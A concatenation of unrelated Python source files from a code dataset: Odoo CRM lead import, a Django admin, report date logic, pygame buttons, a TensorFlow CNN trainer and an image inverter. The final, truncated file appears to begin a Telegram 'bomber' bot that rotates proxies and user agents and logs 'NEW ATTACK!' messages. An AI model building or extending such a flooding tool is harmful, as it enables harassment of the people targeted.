chat['OperatorId']\n _logger.info('Retrieving details of operator %s', chat_operator_id)\n operator = livezilla.Operator(chat_operator_id, lz)\n try:\n operator.load()\n except livezilla.OperatorNotFoundError as ex:\n _logger.warn(ex)\n _logger.warn('Skipping chat %s', chat['ChatId'])\n continue\n _logger.info('Retrieved operator: %s', operator)\n chat['Operator'] = operator\n\n return chats\n\n def close_tickets(self, tickets):\n \"\"\"\n Close a list of tickets\n :param tickets: list of IDs of tickets to close\n :return: True on success\n \"\"\"\n lz = self._get_livezilla_connector()\n for item in tickets: # type: dict\n ticket_id = item['Ticket']['Id']\n _logger.info('Closing ticket %s', ticket_id)\n lz.close_ticket(ticket_id)\n\n return True\n\n @api.model\n def tickets_to_leads(self):\n \"\"\"\n Load livezilla tickets and create leads from them\n \"\"\"\n timestamp = self.env['ir.config_parameter'].get_param(LIVEZILLA_TICKET_PARAM_KEY)\n if not timestamp:\n self.env['ir.config_parameter'].set_param(LIVEZILLA_TICKET_PARAM_KEY, time.time())\n timestamp = time.time()\n\n tickets = self.fetch_tickets(timestamp)\n _logger.debug(tickets)\n if len(tickets) == 0:\n return\n\n contacts = pdf_external_leads_livezilla.extract_contacts_from_tickets(tickets)\n _logger.debug(contacts)\n self.create_or_update_contacts(contacts, 'ticket')\n leads = pdf_external_leads_livezilla.extract_leads_from_tickets(tickets)\n _logger.debug(leads)\n\n for lead in leads: # type: dict\n if lead['contact_email'] is not None and lead['contact_email'].endswith('portadafrente.pt'):\n _logger.info('Skipping lead because it is an internal %s (%s)', 'ticket', lead['contact_email'])\n continue\n\n subject = lead.get('name', '')\n description = lead.get('description', '')\n contact_name = lead.get('contact_name', None)\n contact_phone = lead.get('contact_phone', None)\n contact_email = lead.get('contact_email', None)\n salesperson_email = lead.get('operator', None)\n salesteam_name = lead.get('group', None)\n product_reference = lead.get('product_code', None)\n\n origin_ref = self.env.ref(_LEAD_ORIGIN_TICKET_REF)\n\n sales_user_ids = []\n if salesperson_email:\n sales_users = self.env['res.users'].search([('login', '=', salesperson_email)])\n if len(sales_users) == 1:\n sales_user_ids = sales_users.ids\n\n salesteam_id = None\n if salesteam_name:\n salesteam_search_result = self.env['crm.case.section'].search([('name', 'ilike', salesteam_name), ('parent_id', '=', False)])\n if len(salesteam_search_result) == 1:\n salesteam_id = salesteam_search_result[0].id\n\n product_id = None\n if product_reference:\n product_search_result = self.env['product.product'].from_internal_code(product_reference)\n if len(product_search_result) == 1:\n product_id = product_search_result.id\n\n self.env['crm.lead'].create_lead(\n subject,\n origin_ref.id,\n description,\n contact_name=contact_name,\n contact_phone=contact_phone,\n contact_email=contact_email,\n product_id=product_id,\n sales_user_ids=sales_user_ids,\n salesteam_id=salesteam_id\n )\n\n self.close_tickets(tickets)\n new_checkpoint = max([float(t['Ticket']['TimestampCreated']) for t in tickets])\n self.env['ir.config_parameter'].set_param(LIVEZILLA_TICKET_PARAM_KEY, new_checkpoint)\n\n @api.model\n def chats_to_leads(self):\n \"\"\"\n Load livezilla chats and create leads from them\n \"\"\"\n timestamp = self.env['ir.config_parameter'].get_param(LIVEZILLA_CHAT_PARAM_KEY)\n if not timestamp:\n self.env['ir.config_parameter'].set_param(LIVEZILLA_CHAT_PARAM_KEY, time.time())\n timestamp = time.time()\n\n chats = self.fetch_chats(timestamp)\n _logger.debug(chats)\n if len(chats) == 0:\n return\n\n contacts = pdf_external_leads_livezilla.extract_contacts_from_chats(chats)\n _logger.debug(contacts)\n self.create_or_update_contacts(contacts, 'chat')\n leads = pdf_external_leads_livezilla.extract_leads_from_chats(chats)\n _logger.debug(leads)\n\n for lead in leads: # type: dict\n if lead['contact_email'] is not None and lead['contact_email'].endswith('portadafrente.pt'):\n _logger.info('Skipping lead because it is an internal %s (%s)', 'chat', lead['contact_email'])\n continue\n\n subject = lead.get('name', '')\n description = lead.get('description', '')\n contact_name = lead.get('contact_name', None)\n contact_phone = lead.get('contact_phone', None)\n contact_email = lead.get('contact_email', None)\n salesperson_email = lead.get('operator', None)\n salesteam_name = lead.get('group', None)\n product_reference = lead.get('product_code', None)\n\n origin_ref = self.env.ref(_LEAD_ORIGIN_CHAT_REF)\n\n sales_user_ids = []\n if salesperson_email:\n sales_users = self.env['res.users'].search([('login', '=', salesperson_email)])\n if len(sales_users) == 1:\n sales_user_ids = sales_users.ids\n\n salesteam_id = None\n if salesteam_name:\n salesteam_search_result = self.env['crm.case.section'].search([('name', 'ilike', salesteam_name), ('parent_id', '=', False)])\n if len(salesteam_search_result) == 1:\n salesteam_id = salesteam_search_result[0].id\n\n product_id = None\n if product_reference:\n product_search_result = self.env['product.product'].from_internal_code(product_reference)\n if len(product_search_result) == 1:\n product_id = product_search_result.id\n\n self.env['crm.lead'].create_lead(\n subject,\n origin_ref.id,\n description,\n contact_name=contact_name,\n contact_phone=contact_phone,\n contact_email=contact_email,\n product_id=product_id,\n sales_user_ids=sales_user_ids,\n salesteam_id=salesteam_id\n )\n\n new_checkpoint = max([int(c['Chat']['TimeStart']) for c in chats])\n self.env['ir.config_parameter'].set_param(LIVEZILLA_CHAT_PARAM_KEY, new_checkpoint)\n","sub_path":"pdf_external_leads/models/pdf_external_leads_livezilla.py","file_name":"pdf_external_leads_livezilla.py","file_ext":"py","file_size_in_byte":16312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"384645081","text":"from django.contrib import admin\r\nfrom Apps.Asset.Request.models import *\r\nfrom django.forms.models import BaseInlineFormSet\r\nfrom django.contrib.auth.models import Group\r\nfrom Apps.Distribution.master_sales.models import *\r\n\r\n#class Choice_service_admin(admin.ModelAdmin):\r\n#\tlist_display = ['service']\r\n#\tsearch_fields = ['service']\r\n\t\r\n#admin.site.register(Choice_service, Choice_service_admin)\r\n\r\nclass DataUserRequestInline(admin.StackedInline):\r\n\tmodel = Data_user_request\r\n\textra = 0\r\n\tverbose_name = \"Data Request\"\r\n\treadonly_fields = ('header','asset','choice_service','date_used','answer_service','description','asset_reply',)\r\n\t\r\nclass Header_user_request_admin(admin.ModelAdmin):\r\n\tlist_display = ['no_reg','user','req_date','department_staff_aggreement']\r\n\tsearch_fields = ['no_reg','department']\r\n\tinlines = [DataUserRequestInline,]\r\n\tdate_hierarchy = 'req_date'\r\n\t\r\n\tdef suit_row_attributes(self, obj, request):\r\n\t\tcss_class = {\r\n\t\t\tTrue:'success', False: 'error',}.get(obj.department_staff_aggreement)\r\n\t\tif css_class:\r\n\t\t\treturn {'class': css_class, 'data': obj.department_staff_aggreement}\r\n\t\r\n\tdef save_model(self, request, Header_user_request,form,change):\r\n\t\tdep = Group.objects.get(user=request.user)\r\n\t\tdep2 = StaffPerson.objects.get(user=request.user)\r\n\t\tif dep.name == 'unit':\r\n\t\t\tHeader_user_request.department = dep2.employee.department\r\n\t\tHeader_user_request.save()\r\n\t\r\n\tdef get_form(self, request, obj=None, **kwargs):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\tdata2 = StaffPerson.objects.get(user=request.user)\r\n\t\tform = super(Header_user_request_admin, self).get_form(request, obj, **kwargs)\r\n\t\tif data.name == 'unit':\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj,'department_staff_aggreement', False)\r\n\t\t\texcept: pass\r\n\t\t\tif x == False:\r\n\t\t\t\tform.base_fields['user'].queryset = form.base_fields['user'].queryset.filter(department=data2.employee.department)\r\n\t\t\telse : \r\n\t\t\t\treadonly_fields = ('user',)\r\n\t\telse: \r\n\t\t\treadonly_fields = ('no_reg','user','req_date','department_staff_aggreement',)\r\n\t\treturn form\r\n\r\n\t\r\n\tdef queryset(self, request, obj=None):\r\n\t\tuser = Group.objects.get(user=request.user)\r\n\t\tuser2 = StaffPerson.objects.get(user=request.user)\r\n\t\tdata = Ms_asset.objects.filter(usage_status = 1)\r\n\t\tif user.name=='unit':\r\n\t\t\treturn Header_user_request.objects.filter(department=user2.employee.department)\r\n\t\telse :\r\n\t\t\treturn Header_user_request.objects.all()\t\r\n\t\t\t\r\n\t\tif request.user.is_superuser:\r\n\t\t\treturn Header_user_request.objects.all()\r\n\t\r\n\tdef get_readonly_fields(self, request, obj=None):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\treadonly_fields = ()\r\n\t\tif data.name == 'unit':\r\n\t\t\treadonly_fields = ('department',)\r\n\t\t\tif getattr(obj, 'department_staff_aggreement', None) == True:\r\n\t\t\t\treadonly_fields = ('user','department','department_staff_aggreement',) \t\r\n\t\t\t\r\n\t\t\t\t\r\n\t\telif data.name == 'staff':\r\n\t\t\treadonly_fields += ('no_reg','user','department','department_staff_aggreement',)\r\n\t\t\r\n\t\tif request.user.is_superuser:\r\n\t\t\treadonly_fields = ()\r\n\t\treturn readonly_fields\r\n\t\r\nadmin.site.register(Header_user_request, Header_user_request_admin)\r\n\r\nclass Data_user_request_admin(admin.ModelAdmin):\r\n\tlist_display = ['ID','header','date_used', 'choice_service','answer_service']\r\n\tsave_on_top = True\r\n\tordering = ('-asset', )\r\n\tlist_filter = ['choice_service',]\r\n\t\r\n\tdef suit_row_attributes(self, obj, request):\r\n\t\tcss_class = {\r\n\t\t\t11:'success',2:'success',13:'success',4:'success',5:'success',6:'success',7:'error'}.get(obj.answer_service)\r\n\t\tif css_class:\r\n\t\t\treturn {'class': css_class, 'data': obj.answer_service}\r\n\t\r\n\tdef get_form(self, request, obj=None, **kwargs):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\tdata2 = StaffPerson.objects.get(user=request.user)\r\n\t\tform = super(Data_user_request_admin, self).get_form(request, obj, **kwargs)\r\n\t\tif data.name == 'unit':\r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\tform.base_fields['asset'].queryset = form.base_fields['asset'].queryset.filter(department=data2.employee.department)\r\n\t\t\t\tform.base_fields['asset'].queryset = form.base_fields['asset'].queryset.filter(usage_status=1)\r\n\t\t\t\tform.base_fields['header'].queryset = form.base_fields['header'].queryset.filter(department_staff_aggreement=False)\r\n\t\t\t\tform.base_fields['header'].queryset = form.base_fields['header'].queryset.filter(department=data2.employee.department)\r\n\t\t\t\tself.exclude = ['asset_reply']\r\n\t\t\telse :\r\n\t\t\t\tself.exclude = ['asset_reply','description',]\r\n\t\telse : \r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\tself.exclude = ['description',] \r\n\t\t\telse: self.exclude = ['asset_reply','description',] \r\n\t\treturn form\r\n\t\t\r\n\t\t\t\r\n\tdef get_readonly_fields(self, request, obj=None):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\treadonly_fields = ()\r\n\t\tif data.name == 'unit':\r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\treadonly_fields = ('answer_service','asset_replyx',)\r\n\t\t\telse: \r\n\t\t\t\treadonly_fields = ('header','asset','choice_service','date_used','answer_service','descriptionx','asset_replyx',)\r\n\t\t\t\r\n\t\telif data.name == 'staff':\r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\treadonly_fields += ('header','choice_service','descriptionx','asset','date_used',)\r\n\t\t\telse: \r\n\t\t\t\treadonly_fields += ('header','choice_service','descriptionx','asset','date_used','answer_service','asset_replyx',)\r\n\t\t\t\t\r\n\t\tif request.user.is_superuser:\r\n\t\t\treadonly_fields = ()\r\n\t\treturn readonly_fields\r\n\t\"\"\"\t\t\r\n\t\t\tif getattr(obj, 'header', None) != None:\r\n\t\t\t\treadonly_fields += ('header','choice_service','description','asset','date_used',)\r\n\t\t\"\"\"\t\r\n\t\t\r\n\t\r\n\tdef queryset(self, request, obj=None):\r\n\t\tuser = Group.objects.get(user=request.user)\r\n\t\tuser2 = StaffPerson.objects.get(user=request.user)\r\n\t\tdata = Ms_asset.objects.filter(usage_status = 1)\r\n\t\tif user.name=='unit':\r\n\t\t\treturn Data_user_request.objects.filter(header__department=user2.employee.department)\r\n\t\telif user.name=='staff' :\r\n\t\t\treturn Data_user_request.objects.all()\t\r\n\t\telif request.user.is_superuser:\r\n\t\t\treturn Data_user_request.objects.all()\r\n\t\r\nadmin.site.register(Data_user_request, Data_user_request_admin)\r\n\r\n","sub_path":"Apps/Asset/Request/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426489027","text":"import models\nimport tasks\nimport sqlalchemy as alchemy\n\nfrom datetime import datetime, date, timedelta\nfrom typing import TypeVar, Generic, Dict, Optional\n\ndef sql_max(a: Optional[any], b: Optional[any]) -> Optional[any]:\n if a is None:\n return b\n elif b is None:\n return a\n else:\n return max(a, b)\n\ndef sql_min(a: Optional[any], b: Optional[any]) -> Optional[any]:\n if a is None:\n return b\n elif b is None:\n return a\n else:\n return min(a, b)\n\nT = TypeVar(tasks.ReportTask)\nclass ReportDateFetcher(Generic[T]):\n task: T\n\n def __init__(self, task: T):\n self.task = task\n\n @property\n def ripe_data_age(self) -> timedelta:\n return timedelta(seconds=0)\n\n @property\n def report_increment(self) -> timedelta:\n return timedelta(days=1)\n\n @property\n def report_interval(self) -> timedelta:\n return timedelta(days=6)\n\n @property\n def max_ripe_date(self) -> datetime:\n return self.clamped_date(models.TimeModel.shared.utc_now - self.ripe_data_age)\n\n def clamped_date(self, date: datetime) -> datetime:\n return datetime.combine(date, datetime.min.time())\n\n def backfill_start_date(self, backfill_target_date: datetime, min_date_fetched: Optional[datetime]=None) -> datetime:\n if min_date_fetched is None:\n return self.clamped_date(backfill_target_date)\n return max(backfill_target_date, self.clamped_date(min_date_fetched) - self.report_increment - self.report_interval)\n \n def backfill_end_date(self, backfill_target_date: datetime, min_date_fetched: Optional[datetime]=None) -> datetime:\n if min_date_fetched is None:\n return min(self.clamped_date(backfill_target_date) + self.report_interval, self.max_ripe_date)\n end_date = self.clamped_date(min_date_fetched) - self.report_increment\n return backfill_target_date - timedelta(days=1) if end_date > self.max_ripe_date else end_date\n\n def report_start_date(self, max_date_fetched: Optional[datetime]) -> datetime:\n if max_date_fetched is None:\n return self.max_ripe_date - self.report_interval\n return self.clamped_date(max_date_fetched) + self.report_increment\n \n def report_end_date(self, max_date_fetched: Optional[datetime]) -> datetime:\n if max_date_fetched is None:\n return self.max_ripe_date\n return min(self.clamped_date(max_date_fetched) + self.report_increment + self.report_interval, self.max_ripe_date)\n\n def handle_report_table_does_not_exist(self):\n backfill_target = models.TimeModel.shared.backfill_target_date\n if backfill_target is None:\n self.task.report_start_date = self.report_start_date(max_date_fetched=None)\n self.task.report_end_date = self.report_end_date(max_date_fetched=None)\n else:\n self.task.report_start_date = self.backfill_start_date(backfill_target_date=backfill_target)\n self.task.report_end_date = self.backfill_end_date(backfill_target_date=backfill_target)\n\n def align_dates_to_increment(self):\n increment = self.report_increment.total_seconds()\n if increment == 0 or self.task.report_start_date > self.task.report_end_date:\n return\n\n interval = (self.task.report_end_date - self.task.report_start_date).total_seconds()\n increments = int(interval / increment)\n rounded_interval = timedelta(seconds=increments * increment)\n \n if models.TimeModel.shared.backfill_target_date is None:\n self.task.report_end_date = self.task.report_start_date + rounded_interval\n else:\n self.task.report_start_date = self.task.report_end_date - rounded_interval\n\n def override_dates_with_time_model(self):\n if models.TimeModel.start_date is not None:\n print(f'Overriding start date from time model:\\n{self.task.report_start_date} -> {models.TimeModel.start_date}')\n self.task.report_start_date = models.TimeModel.start_date\n if models.TimeModel.end_date is not None:\n print(f'Overriding end date from time model:\\n{self.task.report_end_date} -> {models.TimeModel.end_date}')\n self.task.report_end_date = models.TimeModel.end_date\n\n def fetch(self):\n self.task.run_date = models.TimeModel.shared.utc_now\n if not self.task.report_table_exists:\n self.handle_report_table_does_not_exist()\n self.override_dates_with_time_model()\n return\n\n backfill_target = models.TimeModel.shared.backfill_target_date\n\n session = self.task.sql_layer.alchemy_session()\n date_column = self.task.report_table_model.table.columns[self.task.report_table_model.date_column_name]\n query = session.query(alchemy.func.max(date_column)) if backfill_target is None else session.query(alchemy.func.min(date_column))\n query = self.task.filtered_alchemy_query_by_identifier_columns(query=query) \\\n .filter(self.task.report_table_model.table.columns[self.task.report_table_model.crystallized_column_name] == True)\n \n max_or_min_date_result = query.one()[0]\n if isinstance(max_or_min_date_result, date):\n max_or_min_date_result = datetime.combine(max_or_min_date_result, datetime.min.time())\n\n if backfill_target is None:\n if self.task.last_run_history is not None and self.task.last_run_history.target_end_time is not None and self.task.last_run_history.status == 'completed':\n max_or_min_date_result = sql_max(max_or_min_date_result, self.task.last_run_history.target_end_time)\n\n self.task.report_start_date = self.report_start_date(max_date_fetched=max_or_min_date_result)\n self.task.report_end_date = self.report_end_date(max_date_fetched=max_or_min_date_result)\n else:\n if self.task.last_run_history is not None and self.task.last_run_history.target_start_time is not None and self.task.last_run_history.status == 'completed':\n max_or_min_date_result = sql_min(max_or_min_date_result, self.task.last_run_history.target_start_time)\n\n self.task.report_start_date = self.backfill_start_date(\n backfill_target_date=backfill_target,\n min_date_fetched=max_or_min_date_result\n )\n self.task.report_end_date = self.backfill_end_date(\n backfill_target_date=backfill_target,\n min_date_fetched=max_or_min_date_result\n )\n \n self.align_dates_to_increment()\n self.override_dates_with_time_model()\n\nclass BaseReportDateFetcher(ReportDateFetcher[tasks.ReportTask]):\n pass\n\nclass CurrentDateFetcher(BaseReportDateFetcher):\n def fetch(self):\n self.task.run_date = models.TimeModel.shared.utc_now\n self.task.report_start_date = self.task.run_date\n self.task.report_end_date = self.task.run_date\n\nU = TypeVar(tasks.MutateReportTask)\nclass MutatorDateFetcher(Generic[U], ReportDateFetcher[U]):\n @property\n def ripe_data_age(self) -> timedelta:\n return timedelta(days=0)\n\nclass BaseMutatorDateFetcher(MutatorDateFetcher[tasks.MutateReportTask]):\n pass\n\nclass MaterializeDateFetcher(Generic[U], MutatorDateFetcher[U]):\n @property\n def report_increment(self) -> timedelta:\n return timedelta(days=-3) if models.TimeModel.shared.backfill_target_date is not None else timedelta(days=-43) \n\n @property\n def report_interval(self) -> timedelta:\n return timedelta(days=60)\n\n def align_dates_to_increment(self):\n pass\n\nclass BaseMaterializeDateFetcher(MaterializeDateFetcher[tasks.MutateReportTask]):\n pass","sub_path":"fetching/fetch_date_base.py","file_name":"fetch_date_base.py","file_ext":"py","file_size_in_byte":7192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"225901348","text":"import pygame\nfrom pygame import Color\n\nfrom ml_tinkering.engine.constants import COLOR_RED, COLOR_GREEN\nfrom ml_tinkering.engine.engine_application import EngineApplication\nfrom ml_tinkering.engine.entitiy.renderable_entity import RenderableEntity\nfrom ml_tinkering.engine.entitiy.tickable_entity import TickableEntity\nfrom ml_tinkering.engine.physics.shape.aabb import AABB\nfrom ml_tinkering.engine.physics.shape.point_shape import PointShape\nfrom ml_tinkering.engine.physics.vec2 import Vec2\nfrom ml_tinkering.engine.graphics.renderer import Renderer\nfrom ml_tinkering.engine.graphics.texture import Texture\n\n\nclass TemplateButton(TickableEntity, RenderableEntity):\n def __init__(self, position: Vec2 = Vec2(), dimension: Vec2 = Vec2(1, 1), centered: bool = False,\n auto_deactivate: bool = False):\n super().__init__(position)\n self.centered = centered\n self.half_dimension = dimension.scaled(1/2)\n self.collision_shape = AABB(position, dimension.scaled(1/2)) if centered else AABB(position + self.half_dimension, self.half_dimension)\n self.dimension = dimension\n self.auto_deactivate = auto_deactivate\n self.active = False\n self.on_active = self.default_on_active\n\n def tick(self, application: EngineApplication, delta: float):\n self.collision_shape.update(\n self.position if self.centered else self.position + self.half_dimension, self.half_dimension)\n mouse_pos = application.mouse_pos\n if self.auto_deactivate and self.active:\n self.active = False\n if application.is_mouse_button_clicked(0) and PointShape(mouse_pos).is_colliding_with_aabb(\n self.collision_shape):\n self.active = not self.active\n if self.active:\n self.on_active()\n\n def default_on_active(self):\n pass\n\n def set_on_active(self, callback):\n self.on_active = callback\n\nclass TexturedButton(TemplateButton):\n def __init__(self, position: Vec2, dimension: Vec2, off_texture: Texture, on_texture: Texture,\n centered: bool = False, auto_deactivate: bool = False):\n super().__init__(position, dimension, centered, auto_deactivate)\n self.off_texture = off_texture\n self.on_texture = on_texture\n\n def render(self, renderer: Renderer):\n if self.active:\n renderer.draw_texture(self.on_texture, position=self.position, centered=self.centered)\n else:\n renderer.draw_texture(self.off_texture, position=self.position, centered=self.centered)\n\n\nclass ColoredButton(TemplateButton):\n\n def __init__(self, position: Vec2 = Vec2(), dimension: Vec2 = Vec2(1, 1), off_color: Color = Color(COLOR_RED),\n on_color: Color = Color(COLOR_GREEN), centered: bool = False, auto_deactivate: bool = False):\n super().__init__(position, dimension, centered, auto_deactivate)\n self.off_color = off_color\n self.on_color = on_color\n\n def render(self, renderer: Renderer):\n if self.active:\n renderer.draw_rectangle(position=self.position, dimension=self.dimension, centered=self.centered,\n color=self.on_color)\n else:\n renderer.draw_rectangle(position=self.position, dimension=self.dimension, centered=self.centered,\n color=self.off_color)\n","sub_path":"ml_tinkering/engine/gui/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"31431221","text":"from other.utils.utils import *\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nx_train = np.load(os.path.join(dir_path, 'other', 'npy', 'x_train_word.npy'), allow_pickle=True)\nx_test = np.load(os.path.join(dir_path, 'other', 'npy', 'x_test_word.npy'), allow_pickle=True)\ny_train = np.load(os.path.join(dir_path, 'other', 'npy', 'y_train_word.npy'), allow_pickle=True)\ny_test = np.load(os.path.join(dir_path, 'other', 'npy', 'y_test_word.npy'), allow_pickle=True)\n\n\nN_FILTERS = 10\nFILTER_SHAPE1 = [20, 20]\nFILTER_SHAPE2 = [20, 1]\nPOOLING_WINDOW = 4\nPOOLING_STRIDE = 2\n\n\ndef char_cnn_model(x, withDropout):\n\n word_vectors = tf.contrib.layers.embed_sequence(\n x, vocab_size=no_words, embed_dim=EMBEDDING_SIZE)\n \n input_layer = tf.reshape(word_vectors, [-1, MAX_DOCUMENT_LENGTH, EMBEDDING_SIZE, 1])\n \n with tf.variable_scope('CNN_Layer1'):\n conv1 = tf.layers.conv2d(\n input_layer,\n filters=N_FILTERS,\n kernel_size=FILTER_SHAPE1,\n padding='VALID',\n activation=tf.nn.relu)\n pool1 = tf.layers.max_pooling2d(\n conv1,\n pool_size=POOLING_WINDOW,\n strides=POOLING_STRIDE,\n padding='SAME')\n \n with tf.variable_scope('CNN_Layer2'):\n conv2 = tf.layers.conv2d(\n pool1,\n filters=N_FILTERS,\n kernel_size=FILTER_SHAPE2,\n padding='VALID',\n activation=tf.nn.relu)\n pool2 = tf.layers.max_pooling2d(\n conv2,\n pool_size=POOLING_WINDOW,\n strides=POOLING_STRIDE,\n padding='SAME')\n\n dim = pool2.get_shape()[1].value * pool2.get_shape()[2].value * pool2.get_shape()[3].value \n \n with tf.variable_scope('CNN_Flatten'):\n flatten = tf.reshape(pool2, [-1, dim])\n \n with tf.variable_scope('ANN'):\n W1 = tf.Variable(tf.truncated_normal([dim, MAX_LABEL], stddev=1.0/np.sqrt(dim)))\n b1 = tf.Variable(tf.zeros([MAX_LABEL]))\n logits = tf.matmul(flatten, W1) + b1\n if withDropout:\n logits = tf.layers.dropout(logits)\n\n return input_layer, input_layer, conv1, pool1, conv2, pool2, flatten, logits\n\n\ndef train(withDropout):\n\n global x_train, x_test, y_train, y_test, no_epochs\n\n # Create the model\n x = tf.placeholder(tf.int64, [None, MAX_DOCUMENT_LENGTH])\n y_ = tf.placeholder(tf.int64)\n\n inputs, input_layer, conv1, pool1, conv2, pool2, flatten, logits = char_cnn_model(x, withDropout)\n\n # Optimizer\n entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=tf.one_hot(y_, MAX_LABEL), logits=logits))\n train_op = tf.train.AdamOptimizer(lr).minimize(entropy)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\n print('input: ', sess.run([tf.shape(inputs)], {x: x_train, y_: y_train}))\n print('input_layer: ', sess.run([tf.shape(input_layer)], {x: x_train, y_: y_train}))\n print('conv1: ', sess.run([tf.shape(conv1)], {x: x_train, y_: y_train}))\n print('pool1: ', sess.run([tf.shape(pool1)], {x: x_train, y_: y_train}))\n print('conv2: ', sess.run([tf.shape(conv2)], {x: x_train, y_: y_train}))\n print('pool2: ', sess.run([tf.shape(pool2)], {x: x_train, y_: y_train}))\n print('flatten: ', sess.run([tf.shape(flatten)], {x: x_train, y_: y_train}))\n print('logits: ', sess.run([tf.shape(logits)], {x: x_train, y_: y_train}))\n\n entropy_on_training = []\n accuracy_on_testing = []\n\n timeRecoder = TimeRecoder()\n timeRecoder.start()\n\n for e in range(no_epochs):\n\n epoch_loss = []\n x_train, y_train = shuffle(x_train, y_train)\n\n # training\n for i in range(len(y_train)//batch_size):\n _, loss_ = sess.run([train_op, entropy], {x: x_train[i*batch_size: (i+1)*batch_size], y_: y_train[i*batch_size: (i+1)*batch_size]})\n epoch_loss.append(loss_)\n \n entropy_on_training.append(sum(epoch_loss)/len(epoch_loss))\n \n # testing\n predict = sess.run([logits], {x: x_test})\n accuracy_on_testing.append(accuracy_score(list(y_test), list(np.argmax(np.array(predict[0]), axis=1))))\n \n \n print('epoch %d: entropy: %f, accuracy: %f' % (e, entropy_on_training[-1], accuracy_on_testing[-1]))\n \n timeRecoder.end()\n\n if withDropout:\n\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_entropy_on_training_withDropout.npy'), np.array(entropy_on_training))\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_accuracy_on_testing_withDropout.npy'), np.array(accuracy_on_testing))\n\n #plot\n plt.figure()\n plt.plot(entropy_on_training)\n plt.plot(accuracy_on_testing)\n plt.title('entropy / accuracy')\n plt.xlabel('epoch')\n plt.legend(['entropy_on_training', 'accuracy_on_testing',], loc='upper left')\n plt.savefig(os.path.join(dir_path, 'other', 'figure', 'word_cnn_withDropout.png')) \n\n else:\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_entropy_on_training_withoutDropout.npy'), np.array(entropy_on_training))\n np.save(os.path.join(dir_path, 'other', 'npy', 'word_cnn_accuracy_on_testing_withoutDropout.npy'), np.array(accuracy_on_testing))\n\n #plot\n plt.figure()\n plt.plot(entropy_on_training)\n plt.plot(accuracy_on_testing)\n plt.title('entropy / accuracy')\n plt.xlabel('epoch')\n plt.legend(['entropy_on_training', 'accuracy_on_testing',], loc='upper left')\n plt.savefig(os.path.join(dir_path, 'other', 'figure', 'word_cnn_withoutDropout.png')) \n\n\n\n\ndef main():\n print('\\n\\n {} \\n Without Dropout ... \\n {} \\n\\n'.format('-'*40, '-'*40,))\n train(withDropout=False)\n\n tf.reset_default_graph()\n\n print('\\n\\n {} \\n With Dropout ... \\n {} \\n\\n'.format('-'*40, '-'*40,))\n train(withDropout=True)\n\n\nif __name__ == '__main__':\n main()","sub_path":"assignment2/assignment2_question_b/word_cnn.py","file_name":"word_cnn.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"424030231","text":"__author__ = 'dominic'\nfrom PIL import Image\n\n\ndef readImage():\n filename = input(\"Input file name (Including extention)\")\n\n try:\n image = Image.open(filename)\n image.load()\n return image\n except:\n print(\"Unable to load image\")\n return readImage()\n\n\nimage = readImage()\nexpFileName = input(\"Input file name of export)\")\nimExp = Image.new('RGB', image.size)\n\nfor y in range(0, image.size[1]):\n for x in range(0, image.size[0]):\n colour = image.getpixel((x, y))\n colour_ = []\n colour_.append(255 - colour[0])\n colour_.append(255 - colour[1])\n colour_.append(255 - colour[2])\n imExp.putpixel((x, y), (colour_[0], colour_[1], colour_[2]))\nimExp.save(expFileName, 'BMP')","sub_path":"PIL Tests/PILcolourInvert.py","file_name":"PILcolourInvert.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"127764966","text":"import asyncio\r\nimport datetime\r\nimport random\r\nimport sys\r\nimport threading\r\n\r\nimport aiohttp\r\nimport pytz\r\n\r\nfrom aiogram import types, exceptions\r\nfrom aiohttp_socks import ProxyConnector\r\nfrom random_user_agent.params import SoftwareName, OperatingSystem\r\nfrom random_user_agent.user_agent import UserAgent\r\n\r\nimport __main__\r\nfrom handlers import start_message\r\nfrom tools import database, proxy_grabber, misc\r\nfrom tools import tools, config\r\nfrom tools.database import get_user, get_users\r\nfrom tools.misc import dp, thinker, check_bomber, logger, bot\r\n\r\nactive_gays = list()\r\nactive_grabber = False\r\n\r\nif not active_grabber:\r\n active_grabber = True\r\n threading.Thread(target=proxy_grabber.grab, args=(logger, database,\r\n config.proxoid_token)\r\n ).start()\r\n\r\n\r\nasync def log(meta: dict):\r\n text = (\"NEW ATTACK!\\n\\n\"\r\n f'User Name: {database.get_user(meta[\"from_user\"])[\"full_name\"]}\\n'\r\n 